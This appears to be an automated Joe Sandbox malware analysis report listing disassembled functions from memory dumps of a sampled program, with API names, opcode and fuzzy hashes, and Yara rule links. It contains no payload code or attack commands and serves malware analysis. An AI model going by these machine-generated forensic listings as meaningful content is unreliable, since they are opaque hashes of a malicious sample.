                                                                                                                                                            • API ID: __vba$CheckHresult$ErrorExitFreeProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4045702744-0
                                                                                                                                                            • Opcode ID: ccc439e8694d0f94d9a812796e14e68a8162fab669cebb24eee0f06880352765
                                                                                                                                                            • Instruction ID: b42082684cfda9da04a5b7e5b2bad02e9e7a05c797a4a6675c2a700778014143
                                                                                                                                                            • Opcode Fuzzy Hash: ccc439e8694d0f94d9a812796e14e68a8162fab669cebb24eee0f06880352765
                                                                                                                                                            • Instruction Fuzzy Hash: 87114A74900214ABCB00DFA6CD48EDEBFF8FF98700F24456AF445B72A0C77859418AA9
                                                                                                                                                            Function 0040F8F0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1195834276-0
                                                                                                                                                            • Opcode ID: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                                                                                                                            • Instruction ID: 20dc9a41ebc36c65f54ff828c917c87bbfccee6e827f5727337c9189070ed0dc
                                                                                                                                                            • Opcode Fuzzy Hash: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                                                                                                                            • Instruction Fuzzy Hash: 05015EB1900205AFCB149FA8C94AB6E7BB8EB44700F50453AF555F3290D73899458B99
                                                                                                                                                            Function 0040F9A0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9DB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9E9
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9F4
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9FD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1195834276-0
                                                                                                                                                            • Opcode ID: 65e89174baaba1573401519e836ee25ddfce7923bb9d535aed6c714f1c2090de
                                                                                                                                                            • Instruction ID: 19c458602e53a293f3e6311b0924b7b74753bb6bdf76692d44a87d1e904a729f
                                                                                                                                                            • Opcode Fuzzy Hash: 65e89174baaba1573401519e836ee25ddfce7923bb9d535aed6c714f1c2090de
                                                                                                                                                            • Instruction Fuzzy Hash: 87019E71A00205AFCB049BB8CD4AA6F7BB8FB48740F50413AF515F32D0D73899058B99

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00007FFD9BEA8A9F Relevance: .7, Instructions: 740COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2994c808a6881cf7c07458dda4f851dce00d7bca5f1b7586052596d98d475117
                                                                                                                                                            • Instruction ID: 0a303f7208a75a9f16201f48ed0232de31837942575e002ee79e625887b7f644
                                                                                                                                                            • Opcode Fuzzy Hash: 2994c808a6881cf7c07458dda4f851dce00d7bca5f1b7586052596d98d475117
                                                                                                                                                            • Instruction Fuzzy Hash: 0652D070A1960D8FEB6CCF58C4A46B877A9FF58304F5141BED44ECB296CB39A981CB41
                                                                                                                                                            Function 00007FFD9BAA0D7C Relevance: .3, Instructions: 261COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1927246357.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9baa0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ac0835c279d57a1801cf6e1c74ebec0d4fdbf7d5013e1e1bf38d2ed04f71a30a
                                                                                                                                                            • Instruction ID: 9166f93c7e007d36f2712e444bcfa32f1bc2e03e1566929bcd50bb8fdfdd64af
                                                                                                                                                            • Opcode Fuzzy Hash: ac0835c279d57a1801cf6e1c74ebec0d4fdbf7d5013e1e1bf38d2ed04f71a30a
                                                                                                                                                            • Instruction Fuzzy Hash: 2B91D475A18A8D4FE799EB6888657A97FE1FF99318F0001BED04DD72D6CBB81805C740
                                                                                                                                                            Function 00007FFD9BAA0B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1927246357.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9baa0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: c9$!k9$"s9
                                                                                                                                                            • API String ID: 0-3426396564
                                                                                                                                                            • Opcode ID: d2e26fa0ed65657ae63860e0153e178c88320430f77beff0b58864d7961f4ac1
                                                                                                                                                            • Instruction ID: 52adb9eb6bc9ee8b3913686ed59d9ed37a6246cb8356c96b9c1d153b69f2aa0d
                                                                                                                                                            • Opcode Fuzzy Hash: d2e26fa0ed65657ae63860e0153e178c88320430f77beff0b58864d7961f4ac1
                                                                                                                                                            • Instruction Fuzzy Hash: 9201D63A71D95A8BC7416B3EB4905D87B50EBC613679A05FBD584CB1A2E2101C9EC7E0
                                                                                                                                                            Function 00007FFD9BEA8828 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                            • Opcode ID: 48df58e7009f9b9c55c70504b7d472d0b75a5f90007e786c61e0840bf56cf4ed
                                                                                                                                                            • Instruction ID: ee04f957edb94d63b7432c41ef6e8ca9fc125c1457fe9193a533931f09c31ba0
                                                                                                                                                            • Opcode Fuzzy Hash: 48df58e7009f9b9c55c70504b7d472d0b75a5f90007e786c61e0840bf56cf4ed
                                                                                                                                                            • Instruction Fuzzy Hash: A9517E71E0960E8FDB59DB98C8A15BDB7B5FF54300F5141BED01AE72A6CE352A01CB41
                                                                                                                                                            Function 00007FFD9BEA37F8 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                            • Opcode ID: cc1e5296d408d6bbd24cc9ce155d15915a100320f7ffd319bc96db478b44b545
                                                                                                                                                            • Instruction ID: 5da9c1ae7d58e30614a4f7ef14eee588c1e0c0449eec30c009d8c5fbeb4b797e
                                                                                                                                                            • Opcode Fuzzy Hash: cc1e5296d408d6bbd24cc9ce155d15915a100320f7ffd319bc96db478b44b545
                                                                                                                                                            • Instruction Fuzzy Hash: 6C5191B1E0A60E8FDB5ADFA8C4A15BDB7B5FF44300F1141BAD01AE72D6CA356905CB40
                                                                                                                                                            Function 00007FFD9BEAD708 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                            • Opcode ID: def619f3cb4ac7847f8b87188d1bdd9833170fc2b2bf9b36dcfc9597ea6bfc51
                                                                                                                                                            • Instruction ID: 176aedeb21a1f5af9772327e95fae2a981e316326ab7b2ad6aa8d7299ceeab2c
                                                                                                                                                            • Opcode Fuzzy Hash: def619f3cb4ac7847f8b87188d1bdd9833170fc2b2bf9b36dcfc9597ea6bfc51
                                                                                                                                                            • Instruction Fuzzy Hash: 93516EB1E0964E8FDB59DB98C4616FCB7B5FF58300F1181BED01AE72A6CA356A01CB41
                                                                                                                                                            Function 00007FFD9BEA1790 Relevance: .7, Instructions: 679COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 286e732bff865435107071c5ef4fff71e0538026d4fa9b3f70668147422f2aef
                                                                                                                                                            • Instruction ID: 3e7c39546c803bce4f02542b4dcd23e6a75aa6bcc292eba3aaaaeadbc14dc5b6
                                                                                                                                                            • Opcode Fuzzy Hash: 286e732bff865435107071c5ef4fff71e0538026d4fa9b3f70668147422f2aef
                                                                                                                                                            • Instruction Fuzzy Hash: 8132E830B09A1D8FDBA8DB48C8A5AB873E9FF55315B1541B9D00EC72A2DE35ED41CB81
                                                                                                                                                            Function 00007FFD9BEA6999 Relevance: .5, Instructions: 465COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: fff6e7a242738edb15dde25c68e52b616ae4546be8406eb5b3a5e8dd3a0c520e
                                                                                                                                                            • Instruction ID: 45f3ef3bc53dc141e2bc4ff6931ea5ff719b0d3db22e301c661a2440de350393
                                                                                                                                                            • Opcode Fuzzy Hash: fff6e7a242738edb15dde25c68e52b616ae4546be8406eb5b3a5e8dd3a0c520e
                                                                                                                                                            • Instruction Fuzzy Hash: 1CE1B570B0DA0D8FDBA8DA48C8A5AB877E9FF55315F1101B9D00DC72A2DE29AD45CB81
                                                                                                                                                            Function 00007FFD9BEA3A68 Relevance: .4, Instructions: 448COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: edafa2b3e8e5cc2231d28de51483f81f3dbbdd6fa89aafd3810bdaf137fa4d2a
                                                                                                                                                            • Instruction ID: 402cb3bbce34ebe9d4c50f35f174468cf0b7fa09b8e2d6cd5e6dd3acec2179e3
                                                                                                                                                            • Opcode Fuzzy Hash: edafa2b3e8e5cc2231d28de51483f81f3dbbdd6fa89aafd3810bdaf137fa4d2a
                                                                                                                                                            • Instruction Fuzzy Hash: 33F1E570A196598FEB69CF58C4E06B477A9FF44300F5181BDC84ECB29ACB39E981CB41
                                                                                                                                                            Function 00007FFD9BEAD97F Relevance: .4, Instructions: 424COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7fa43528279b4374a3ccfe536d0fba29993f8000149b543de7822f0bc98836c4
                                                                                                                                                            • Instruction ID: 279a74f04480bc0394a8fc334ab047d2ab4457cf6659d9238be0d0ca69913aa8
                                                                                                                                                            • Opcode Fuzzy Hash: 7fa43528279b4374a3ccfe536d0fba29993f8000149b543de7822f0bc98836c4
                                                                                                                                                            • Instruction Fuzzy Hash: A9F1D570A195598FEB58CF58C4E06B477A9FF45300F5582BDC84ECB69ACA39F982CB40
                                                                                                                                                            Function 00007FFD9BEA4AB1 Relevance: .4, Instructions: 414COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b3ddd0e3e3414eb91dacf9ba58fdf4224f8a4e0ae26527a429b52b836a88aca7
                                                                                                                                                            • Instruction ID: 06318410de2fbaff5468d2fd435a578ad062e29d373b6b048e170795d208209b
                                                                                                                                                            • Opcode Fuzzy Hash: b3ddd0e3e3414eb91dacf9ba58fdf4224f8a4e0ae26527a429b52b836a88aca7
                                                                                                                                                            • Instruction Fuzzy Hash: 62D1F270A0EB0A4FE379DB68D0A057577F9FF44300B15457EC48EC76A2DE2ABA428741
                                                                                                                                                            Function 00007FFD9BEAE9C1 Relevance: .4, Instructions: 410COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3ba4a2b30ad53859a544774dbb4090a99af58129562f8adc0b98e218ee9b6aa7
                                                                                                                                                            • Instruction ID: 9fd0dc8a89d755d275aa73908f5c0ed40ab8ea5dbe0e79f19248bf0dfa1ab57c
                                                                                                                                                            • Opcode Fuzzy Hash: 3ba4a2b30ad53859a544774dbb4090a99af58129562f8adc0b98e218ee9b6aa7
                                                                                                                                                            • Instruction Fuzzy Hash: 2CD11670A0EB4A8FD378DBA8C4A417577E9FF44300B25057EE08FC76E2DA2AB9418741
                                                                                                                                                            Function 00007FFD9BEA9AE1 Relevance: .4, Instructions: 407COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8932bb202950ff869a9b820b2f0122e763e8fcba9c67b66ac52969344324bfdb
                                                                                                                                                            • Instruction ID: 02cc2f7d5322cfebe482c99851b80879e2bcb9f9c289ae24cc5233383d1d2537
                                                                                                                                                            • Opcode Fuzzy Hash: 8932bb202950ff869a9b820b2f0122e763e8fcba9c67b66ac52969344324bfdb
                                                                                                                                                            • Instruction Fuzzy Hash: CED12474B0EB0A4FEB78DB68C4A857577E9FF44300B11457EC08EC76A6DE2AB9428741
                                                                                                                                                            Function 00007FFD9BEA8ABF Relevance: .3, Instructions: 337COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: bac603557578ad03f8ba12bcaeed94526052f731c9ea979473845d4ebe39c81d
                                                                                                                                                            • Instruction ID: 9a960e694dd4510432cefffb781286ba08c5f0e264e83d99ba9c342aae4f1514
                                                                                                                                                            • Opcode Fuzzy Hash: bac603557578ad03f8ba12bcaeed94526052f731c9ea979473845d4ebe39c81d
                                                                                                                                                            • Instruction Fuzzy Hash: 54C1057061A54A8BEB2CCF48C4E05B137A9FF45304B9146BDD84B8B69BCB39F942CB45
                                                                                                                                                            Function 00007FFD9BEAD99F Relevance: .3, Instructions: 336COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9932b7a6297dffe3d0d25fb72d62d4c561d84c4eb58ac33af4e5b043e7832091
                                                                                                                                                            • Instruction ID: 512279ac07dae316df4aa1cf2d8eefc8c7d7303b617ab0cc93b23fabf06815be
                                                                                                                                                            • Opcode Fuzzy Hash: 9932b7a6297dffe3d0d25fb72d62d4c561d84c4eb58ac33af4e5b043e7832091
                                                                                                                                                            • Instruction Fuzzy Hash: 0AC1F770A1954A8FEB1DCF54C4E06B137A9FF45310B5586BDD88B8B69BCA38F942CB40
                                                                                                                                                            Function 00007FFD9BEA3A8F Relevance: .3, Instructions: 335COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: eddb2b0c8a0eff5fcefe24a3a90b2fcc1aa81857a8c3795dc5bb14f38e156a4d
                                                                                                                                                            • Instruction ID: 3e8e9627b55c9f27a2988498302db3b7569efb5aa06484c505e6133f33169fcb
                                                                                                                                                            • Opcode Fuzzy Hash: eddb2b0c8a0eff5fcefe24a3a90b2fcc1aa81857a8c3795dc5bb14f38e156a4d
                                                                                                                                                            • Instruction Fuzzy Hash: E4C1F67061A64A8FEB1ECF58C0E05B477A9FF45304B5585BDC84B8B69BCA39F941CB40
                                                                                                                                                            Function 00007FFD9BEAD232 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 31cbcefe1251f2ecdc94a02a8457304c322bc1fbb294e8af21676df14d218013
                                                                                                                                                            • Instruction ID: c92c85c0a2d518b25de5627dd4dd31656a6dd291023e237577826fe8ed398f1f
                                                                                                                                                            • Opcode Fuzzy Hash: 31cbcefe1251f2ecdc94a02a8457304c322bc1fbb294e8af21676df14d218013
                                                                                                                                                            • Instruction Fuzzy Hash: B0C10570B0AA4A8FE759DB58C0A06B4B7E9FF58304F458179D04EC7A96CB39F951CB80
                                                                                                                                                            Function 00007FFD9BEAABF7 Relevance: .3, Instructions: 314COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6fd07aa92cafc41e52d620beca9e6ba47a6e6389c90fe79ded063aa6d630cd64
                                                                                                                                                            • Instruction ID: 16b622994fb9674cb3d8165abac4e98801450de046c433845058d8dfa10c74dd
                                                                                                                                                            • Opcode Fuzzy Hash: 6fd07aa92cafc41e52d620beca9e6ba47a6e6389c90fe79ded063aa6d630cd64
                                                                                                                                                            • Instruction Fuzzy Hash: AD213682F0FB9F86F67561E828711FC564C5F54325F1A66BBD44E860F2CC0EAAC152A2
                                                                                                                                                            Function 00007FFD9BEA0CD1 Relevance: .3, Instructions: 301COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 22e9a7468a306dc69e3f9a9b65f5f3f8e2076c4bc5d773515951f751f5a05aed
                                                                                                                                                            • Instruction ID: f379c4d74eccfcc480d84ee0c2a01e97170e3ad4fee05b927356c230f3ced9f4
                                                                                                                                                            • Opcode Fuzzy Hash: 22e9a7468a306dc69e3f9a9b65f5f3f8e2076c4bc5d773515951f751f5a05aed
                                                                                                                                                            • Instruction Fuzzy Hash: FD214B96F0F58F8BF63556E4083097CA68C6F40B20F1A06BAD44D960F3DD5E2E547382
                                                                                                                                                            Function 00007FFD9BEA0D0D Relevance: .3, Instructions: 289COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 752b202fb8ce7a7005444507617a56024ce42b03c1627f2ab84d0b72904dd80a
                                                                                                                                                            • Instruction ID: 14acee231ae368dcaacf7249b3f4c2dd3ecce2c4240912579b8d2051d7dfa8fb
                                                                                                                                                            • Opcode Fuzzy Hash: 752b202fb8ce7a7005444507617a56024ce42b03c1627f2ab84d0b72904dd80a
                                                                                                                                                            • Instruction Fuzzy Hash: 34212B96F0F68F8BF77556E4083097CA68C5F50B20F1A06BAD48D960F3DC5A2E546382
                                                                                                                                                            Function 00007FFD9BEA337A Relevance: .3, Instructions: 288COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8cb0dbc7f8037adecdeafe5c59089174ff32e984b44110141b5099968bc06643
                                                                                                                                                            • Instruction ID: a1bc06cb093e819c2f4fd943a2492db29ae70130dea82f601d06973862f7231d
                                                                                                                                                            • Opcode Fuzzy Hash: 8cb0dbc7f8037adecdeafe5c59089174ff32e984b44110141b5099968bc06643
                                                                                                                                                            • Instruction Fuzzy Hash: EAA10770A0EA4A8FE75ADB68C0A06B4B7E9FF45300F5541BDD04EC7A97CB29B951C780
                                                                                                                                                            Function 00007FFD9BEA5D70 Relevance: .3, Instructions: 283COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
